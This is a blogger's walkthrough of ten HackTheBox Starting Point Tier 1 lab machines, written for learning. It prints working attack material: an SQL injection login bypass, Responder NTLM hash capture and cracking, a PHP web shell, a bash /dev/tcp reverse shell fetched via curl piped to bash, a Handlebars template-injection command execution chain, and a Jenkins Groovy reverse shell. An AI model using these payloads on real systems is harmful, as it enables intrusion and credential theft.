HackTheBox StartingPoint Tier 1

28-05-2024

This is the second collection of boxes designed as an introduction to HackTheBox

These are the second set of boxes on HackTheBox. I got stuck on Three for around a year when I was hit by a massive lack of motivation. However, I am back now, working through it all. I did find the range of difficulty in this room to be wild: some of the boxes were as simple as a passwordless login to a service, and others took a lot of steps. For several of them I used the walkthrough, but it still helped me learn more about the box I was attacking.

Due to the length of the writeups here, I have added a contents to ease navigation.

  1. Appointment: A web application vulnerable to SQL injection
  2. Sequel: A vulnerable database service with weak credentials
  3. Crocodile: An FTP service running with weak credentials
  4. Responder: A Windows web server vulnerable to file inclusion, allowing NTLM hash capture
  5. Three: A website using a vulnerable S3 bucket for storage
  6. Ignition: A website with a vulnerable e-commerce platform
  7. Bike: A Node.js website vulnerable to Server-Side Template Injection
  8. Funnel: An insecure FTP service gives access to a machine with a PostgreSQL database
  9. Pennyworth: A Jenkins server with weak credentials, allowing a Groovy reverse shell
  10. Tactics: A Windows machine running an insecure SMB service

Appointment

In this box, there is a web application running on Apache on port 80. We can enumerate this using Gobuster, using the -x flag to specifically look for .php files. From there we find a page called login.php, which we can then attempt to exploit. Following instructions telling us to log in as admin without a password, we can use the following trick:

admin'#

The username value above works if there is no input sanitization and the login system is backed by an SQL database. Assume the login code runs a query like this:

Allow login where username = 'username' and password = 'password';

The single quote at the end of the username closes off the username string value, and then the #, which is a comment character in SQL, tells the database to ignore the rest of the line, allowing login without a password.
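
The trick can be sketched in a few lines of Python (the table and column names are hypothetical, purely to illustrate the truncation):

```python
def build_query(username, password):
    # Vulnerable pattern: user input concatenated straight into the SQL string
    return f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}';"

injected = build_query("admin'#", "anything")

# In MySQL/MariaDB, everything after '#' is a comment, so the effective
# query the server executes is only the part before it.
effective = injected.split("#", 1)[0]
print(effective)
# SELECT * FROM users WHERE username = 'admin'
```

The password comparison never reaches the database, so any (or no) password succeeds for the admin row.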

Back to top

Sequel

From our Nmap scan, we discover a MariaDB instance running on port 3306. This service allows us to log in as root without a password, which can be done using the following command:

mysql -h [IP address] -P 3306 -u root

From there we can view the databases on the instance using:

SHOW DATABASES;

It returns four databases: information_schema, mysql, performance_schema and htb. The first three are all default databases on MariaDB. From there we can see which tables can be accessed using:

SHOW OPEN TABLES;

and once we have located the necessary table, we can view its contents using:

SELECT * FROM [table];

Back to top

Crocodile

From our Nmap scan we can see that there is an FTP service and an HTTP service running on the box. Using the -sC flag with Nmap will run scripts to find out more about each service, and in this case it returns whether anonymous login to the FTP server is allowed. Seeing that it is, we can connect to the FTP instance and list the available files, two of which appear to contain login credentials. After taking down the credential pair for the user "admin", we can use Gobuster to find a login page on the website, and we can use the found credentials to gain access.

Back to top

Responder

We can enumerate the machine using the following command:

nmap -p- --min-rate 5000 -sV 10.129.147.104

In other runs of the Nmap scan, the box appeared unresponsive, but this may have been an error on my part. The scan shows a machine running Windows as its operating system, with an Apache web server on port 80 and WinRM (Windows Remote Management) on port 5985.

Windows Remote Management is Windows' built-in remote management protocol. It uses the Simple Object Access Protocol (SOAP) to interact with remote computers and servers, as well as their operating systems and applications, allowing a user to remotely execute commands and manage the machine.

When trying to access the given web server, the website redirects to a new URL that our machine doesn't know how to resolve. This is because the web server employs name-based virtual hosting to serve requests. This is a method for hosting multiple domain names (with separate handling of each name) on a single server, allowing one server to share its resources, such as memory and processor cycles, without requiring every service to be served under the same hostname. The resolution issue can be fixed by running the following command:

echo "[IP Address] [Domain name]" | sudo tee -a /etc/hosts

Once the page can be accessed, it can be seen that the web server uses different HTML files to provide different language options for the website. This presents an option for Local File Inclusion (LFI). One of the common files to test for LFI on Windows systems is the hosts file: WINDOWS\System32\drivers\etc\hosts (this file aids the local translation of host names to IP addresses). Using directory traversal we can see that, in this case, Local File Inclusion is possible.
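
The traversal itself can be sketched by resolving the path by hand; the webroot below is a hypothetical XAMPP-style path, purely for illustration:

```python
import posixpath

# Hypothetical webroot; each ../ in the payload climbs one directory
# level before the include path is resolved by the server.
webroot = "C:/xampp/htdocs"
payload = "../../windows/system32/drivers/etc/hosts"

resolved = posixpath.normpath(posixpath.join(webroot, payload))
print(resolved)
# C:/windows/system32/drivers/etc/hosts
```

Because the include parameter is resolved after the traversal sequences are applied, the final path lands outside the webroot entirely.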

As we know the page is vulnerable to file inclusion, there is a potential for including a file hosted on our attacker workstation. Because the target is a Windows machine, if we use a protocol like SMB, Windows will try to authenticate to our machine and we can capture the NetNTLMv2 hash.

In the PHP configuration file, php.ini, the allow_url_include directive is set to Off by default, meaning PHP will not load remote HTTP or FTP URLs, to prevent remote file inclusion attacks. However, even with the URL options off, PHP does not prevent the loading of SMB URLs, and we can misuse this to steal the NTLM hash. This can be done using Responder.

Responder can perform many different types of attack, but for this scenario we are going to use it to set up a malicious SMB server. When the target machine attempts NTLM authentication to that server, Responder sends back a challenge for the target to encrypt with the user's password hash. While we can't reverse the captured response (it is hashed), we can recompute it for many common passwords and look for a match, a dictionary attack.
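
The cracking step can be sketched in miniature. This is not the real NetNTLMv2 computation (which uses an HMAC-MD5 keyed from the MD4 NT hash, over more fields than just the challenge); it is a simplified stand-in showing the dictionary-attack principle John relies on:

```python
import hashlib
import hmac

CHALLENGE = b"\x01\x02\x03\x04\x05\x06\x07\x08"

def response_for(password, challenge):
    # Stand-in key derivation (the real scheme uses MD4 over UTF-16LE);
    # the dictionary-attack logic is the same either way.
    key = hashlib.md5(password.encode("utf-16-le")).digest()
    return hmac.new(key, challenge, hashlib.md5).digest()

# What Responder would have captured from the target
captured = response_for("badminton", CHALLENGE)

def crack(captured, challenge, wordlist):
    # Recompute the response for every candidate until one matches
    for candidate in wordlist:
        if response_for(candidate, challenge) == captured:
            return candidate
    return None

print(crack(captured, CHALLENGE, ["password", "letmein", "badminton"]))
# badminton
```

Because the challenge is known to us (we issued it), every candidate password can be tested offline at full speed.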

Firstly, when using Responder, we need to check the configuration file (Responder.conf) is set to listen for SMB requests (SMB should be set to On). Once the configuration file is ready, we can start Responder with Python3, passing the network interface to listen on using the -I flag:

sudo python3 Responder.py -I [network interface]

Once the Responder server is ready, we tell the web server to include a resource from our SMB server by setting the page parameter as follows:

http[://]unika[.]htb/?page=//10[.]10[.]14[.]7/somefile

Because we have the freedom to specify the address of the SMB share, we specify the IP address of our attacking machine, so the server tries to load the resource from our SMB server. The page will return an error saying the file cannot be found, but Responder will have captured a NetNTLMv2 hash for the administrator user. This hash can be echoed into a text file and then passed to John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This returns that the administrator password is "badminton". We can use this to connect to the WinRM service and try to get a session. Because PowerShell isn't installed on Linux by default, we can use a tool called Evil-WinRM, which is made for this kind of scenario:

evil-winrm -i 10.129.147.104 -u administrator -p badminton

Back to top

Three

We can start by enumerating the target IP with an Nmap scan as follows:

sudo nmap -sV [target IP]

We can see an SSH service running on port 22 and a webpage running on port 80. We can check this web page out in our web browser and see it is the page of a band. In the contact form, there is an email with the domain thetoppers.htb. We can add an entry to /etc/hosts to be able to access this domain from the web browser. This is done with the following command:

echo "[IP Address] [Domain name]" | sudo tee -a /etc/hosts

Now we can check this domain for subdomains. A subdomain is a piece of additional information added to the beginning of a website's domain name. It allows a website to separate and organise content for a specific function, such as a blog or store, from the rest of the site. Often, different subdomains have different IP addresses, so when our system looks up the subdomain, it gets the address of the server that handles that application. It is also possible for one server to handle multiple subdomains. This is accomplished via "host-based routing", or "virtual host routing", where the server uses the Host header in the HTTP request to determine which application should handle the request.
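
Host-based routing can be sketched in a few lines: the server keys its applications on the Host header, so multiple names on one IP get different responses (the handler strings below are placeholders):

```python
# One server, one IP: the Host header alone selects the application.
VHOSTS = {
    "thetoppers.htb": "band homepage",
    "s3.thetoppers.htb": "S3 storage API",
}

def route(host_header):
    # Unknown names fall through to a default handler (often a 404
    # or the server's default site)
    return VHOSTS.get(host_header.lower(), "default site")

print(route("s3.thetoppers.htb"))  # S3 storage API
print(route("THETOPPERS.HTB"))     # band homepage
```

This is also why subdomain enumeration tools like Gobuster's vhost mode work: they vary only the Host header against a fixed IP and watch for responses that differ from the default.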

As we have the domain name, we can enumerate for subdomains with GoBuster, using the following command:

gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http[://]thetoppers[.]htb

Almost immediately we get a result on s3.thetoppers.htb. We can add this to our /etc/hosts file to allow us to access it in the browser. When we visit this page the only thing displayed is

{"status": "running"}

Googling the information we have so far shows that S3 is a cloud-based object storage service. It allows us to store things in containers called buckets. To interact with these buckets we need awscli. We can use aws configure to configure the connection, putting an arbitrary value into all the fields: sometimes the server is not configured to check authentication, but awscli still needs a value there to work. We can then list all the S3 buckets hosted on the server by using the ls command:

aws --endpoint=http[://]s3[.]thetoppers[.]htb s3 ls

We can also use the ls command to list objects and common prefixes under the specified bucket:

aws --endpoint=http[://]s3[.]thetoppers[.]htb s3 ls s3[://]thetoppers[.]htb

Using this command we can see that there are two files called .htaccess and index.php, and a directory called images. It is safe to assume that this is the webroot of the website running on port 80. This means the Apache server is using the S3 bucket as storage.

Awscli has another feature that allows us to copy files to a remote bucket. We already know the website is using PHP. Thus, we can try uploading a PHP shell file to the S3 bucket, and since it's uploaded to the webroot directory, we can visit this webpage in the browser, which will, in turn, execute this file and we will achieve remote code execution. The following PHP one-liner uses system() to take the URL parameter 'cmd' as an input and execute it as a system command:

<?php system($_GET['cmd']); ?>

We can simply echo this into a file to get a shell file to upload. We can then use the following command to upload it to the bucket:

aws --endpoint=http[://]s3[.]thetoppers[.]htb s3 cp shell.php s3[://]thetoppers[.]htb

Navigating to http[://]thetoppers[.]htb/shell[.]php?cmd=id gives the output of the OS command id. This shows that we have remote code execution on the box. Now we can attempt to get a reverse shell, which will make the remote host connect back to our machine's IP address on a specified listening port. We can create a script shell.sh containing the following bash reverse shell payload, which will connect back to our local machine on port 1337.

#!/bin/bash
bash -i >& /dev/tcp/[IP address]/1337 0>&1

We can then set up a netcat listener on port 1337 to catch the reverse shell. We also need to set up an HTTP server to serve the shell script. These can be done with the following commands:

nc -nvlp 1337

python3 -m http.server 8000

We can use curl to fetch the bash reverse shell script from our local HTTP server, piping it to bash to execute it. The request looks like this:

http[://]thetoppers[.]htb/shell.php?cmd=curl%20[IP address]:8000/shell.sh|bash

From there we can navigate and find the flag.

Back to top

Ignition

We can enumerate the target to find a service running on port 80: nginx 1.14.2. Visiting the IP in the browser just gives a Server Not Found error. We can try the following command to access the contents of the page:

curl -v http[://][ip address]

This returns an HTTP status code of 302. This "response code means that the URI of requested resource has been changed temporarily. Further changes in the URI might be made in the future. Therefore, this same URI should be used by the client in future requests". The response shows that the site expects to be visited using the virtual host name ignition.htb. We can add an entry to /etc/hosts to tie the IP address and the virtual host name together. This can be done with the following line:

echo "[IP Address] [Domain name]" | sudo tee -a /etc/hosts

Doing this allows us to access the homepage for something called Luma. We can try and brute-force directories on the webpage using Gobuster. The command is as follows:

gobuster dir -u http[://]ignition[.]htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

From there, we can find a page called admin, which sounds worth investigating. If we put it in the address bar, we get taken to a login page for a service called Magento, which is an open-source e-commerce platform. From here we can look at the most common passwords for 2023, and just try those until we get one right, which lets us log into the admin page and collect the flag.

Back to top

Bike

We start with an nmap scan of the endpoint. There are two services running: SSH on port 22 and an HTTP service on port 80. The service on port 80 is run by Node.js, with Wappalyzer identifying the web framework as Express.

We can test for Server Side Template Injection by putting {{7*7}} into the input box and seeing what happens. In this case we get a long JSON error. From the error message, we can see that Handlebars is the templating engine being used within Node.js.

We can then look on HackTricks to find a Server-Side Template Injection payload for Handlebars. If we URL-encode it and put it in the email entry, we get a new error saying "require is not defined".

{{this.push "return require('child_process').exec('whoami');"}}

This is the section of the payload that uses require. It attempts to load the child_process module and use it to execute commands. As require doesn't work, we need to find a way around it. Googling the top-level scope in Node.js shows it is called global, and that require isn't actually a global: it is local to each module. Scrolling up the global documentation, we can find an object called process, which is global and can be used anywhere. Scrolling through the process documentation, we can find that process.mainModule is an alternative way to reach require.main, which is hopeful. Including the following line in the payload can help us test whether process.mainModule will return an error.

{{this.push "return process.mainModule;"}}

The output from the payload does not include an error, which is a great sign. We can then try and require the child process through the mainModule like so:

{{this.push "return process.mainModule.require('child_process');"}}

This also doesn’t return an error, so we can start executing commands in the same way as previously:

{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}

Then, we can submit a placeholder into the email field and catch the HTTP request in BurpSuite. We can then replace our placeholder in the email field with our URL encoded payload. The whoami command returns root. We can then change whoami to ls /root to see what is in the root directory. Its output includes flag.txt, which we can read with cat to get the flag.
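
The URL-encoding step is mechanical; Python's urllib shows what a payload looks like on the wire, using the simple {{7*7}} probe as the example:

```python
from urllib.parse import quote, unquote

probe = "{{7*7}}"
# Percent-encode every reserved character so it survives inside a
# form field / query string
encoded = quote(probe, safe="")
print(encoded)
# %7B%7B7%2A7%7D%7D

# Decoding round-trips back to the original payload
assert unquote(encoded) == probe
```

The full Handlebars payload is encoded the same way before being pasted into the intercepted request in Burp.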

Back to top

Funnel

We start with an nmap scan on the given IP address. This shows an FTP service on port 21 and an SSH service on port 22. We can connect to the FTP service with the following command:

ftp [IP address]

From there, anonymous login is enabled, so we can just log in with the anonymous username/password combo. From there we can use ls to see what directories are available. There is one called mail_backup. We can move into it and list again to see what is in there. There is a copy of an email sent to a couple of recipients, welcoming them to the company "Funnel". The accompanying PDF covers the company's password policy, including their default password. We can take the names from the emails and attempt to use them alongside the default password to see if we can SSH in. We can. Thanks Christine. From there we can use the following command to list listening ports on the machine:

ss -tl

From there, we can see a PostgreSQL service, which listens on port 5432 as standard. The service only listens locally, so we can't reach it directly from our own machine; instead, we create an SSH tunnel and connect to it through that. This is local port forwarding. The command is as follows:

ssh -L 1234:localhost:5432 christine@[target IP]

or

ssh -L [local port]:[destination IP]:[destination port] [user]@[target IP]

This is run on our own machine (hence the name local port forwarding). We also need to install the PostgreSQL client software so we can interact with the service. This can also be done on our local machine using the following command:

sudo apt update && sudo apt install postgresql-client
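
What the tunnel actually does can be sketched with plain sockets: a listener on a local port relays bytes to the destination service, which is essentially what ssh -L sets up (over an encrypted channel, and for many connections rather than this toy single round trip):

```python
import socket
import threading

def fake_service(ready, port_box):
    # Stand-in for the remote PostgreSQL service: accept one
    # connection and echo the request back with a prefix
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    port_box.append(srv.getsockname()[1])
    srv.listen(1)
    ready.set()
    conn, _ = srv.accept()
    conn.sendall(b"echo: " + conn.recv(1024))
    conn.close()

def forwarder(entry, dest_port, ready):
    # The tunnel: accept locally, relay one round trip to the destination
    entry.listen(1)
    ready.set()
    client, _ = entry.accept()
    upstream = socket.create_connection(("127.0.0.1", dest_port))
    upstream.sendall(client.recv(1024))   # client -> destination
    client.sendall(upstream.recv(1024))   # destination -> client
    upstream.close()
    client.close()

svc_ready, ports = threading.Event(), []
threading.Thread(target=fake_service, args=(svc_ready, ports), daemon=True).start()
svc_ready.wait()

entry = socket.socket()
entry.bind(("127.0.0.1", 0))  # ephemeral stand-in for the chosen local port
local_port = entry.getsockname()[1]
fwd_ready = threading.Event()
threading.Thread(target=forwarder, args=(entry, ports[0], fwd_ready), daemon=True).start()
fwd_ready.wait()

# The client only ever talks to the local end of the tunnel
with socket.create_connection(("127.0.0.1", local_port)) as c:
    c.sendall(b"SELECT 1")
    reply = c.recv(1024)
print(reply.decode())
# echo: SELECT 1
```

This is why psql can be pointed at localhost:1234: from its point of view the database lives on the local machine, and the relay delivers its traffic to the real service.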

From there, once we have our local port forward up, we can connect to the forwarded port from our own machine with psql -h localhost -p 1234 -U christine, reusing Christine's password. We can list all the existing databases on the service with \list, then connect to the one we want, in this case secrets, with \connect secrets. We can then list the database tables using the \dt command, and dump the table's contents using a standard SQL query:

SELECT * FROM flag;

This gives us the flag.

Back to top

Pennyworth

We begin with a scan of the target. This reveals a service running on port 8080: Jetty 9.4.39.v20210325. As it is an HTTP service, we can visit it in the browser using the following address:

http[://][target IP][:]8080

The page we are brought to says "Welcome to Jenkins". A quick Google search reveals that Jenkins is "the leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project". We are presented with a login page, where we can spray common weak credentials until we manage to log in with "root/password". Once we are in, we can see a user interface that is like a file hub, and it looks like it accepts Groovy scripts. A quick search for Groovy reverse shells gives us some code we can upload.

We need to change the host to our own IP, and the command to /bin/bash, because we are targeting a Linux machine, not a Windows machine. We also set up a netcat listener on our own machine to catch the reverse shell; this has to listen on port 8044, the port used in the script. Once we catch the shell, we can run whoami to see what privileges we have. Once we confirm we have root privileges, we can list the /root directory, find flag.txt and read it to get the flag.

Back to top

Tactics

We start out with an nmap scan with the -sV flag. This responds saying the host seems to be down and to try the -Pn flag. Doing so reveals an msrpc service on port 135, a netbios-ssn service on port 139 and a microsoft-ds service on port 445. Given the box is about SMB, we can focus on that port first. We're going to attempt to list SMB shares as the Administrator, given that it's a high-privilege account on Windows. This can be done using the following command:

smbclient -L [IP address] -U Administrator

Then it prompts us for a password and we just hit enter and hope for the best. It lets us in. From there we can see three shares with a $ at the end. This indicates an administrative share. We can navigate into a share using the following command:

smbclient \\\\[IP address]\\[Share name] -U Administrator

In this case I chose the C$ share, as this likely represents the Windows file system. Once in the share we can navigate through the Users folder to the Administrator's desktop, where the flag sits. From there we can get it onto our own system using get. Then we can read it and submit it.
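
A note on the quadruple backslashes in the smbclient command: the shell consumes one level of escaping before smbclient sees the argument, so \\\\[IP address]\\[Share name] arrives as the UNC path \\[IP address]\[Share name]. A rough model of that single unescaping pass (real shell quoting has more rules; this is only an illustration, with a made-up IP):

```python
# What you type at the shell (raw string so Python keeps every backslash)
typed = r"\\\\10.129.1.1\\C$"

# Rough model: the shell collapses each escaped backslash pair into one
after_shell = typed.replace("\\\\", "\\")
print(after_shell)
# \\10.129.1.1\C$
```

Quoting the whole argument ('\\IP\C$') is an alternative way to stop the shell eating the backslashes.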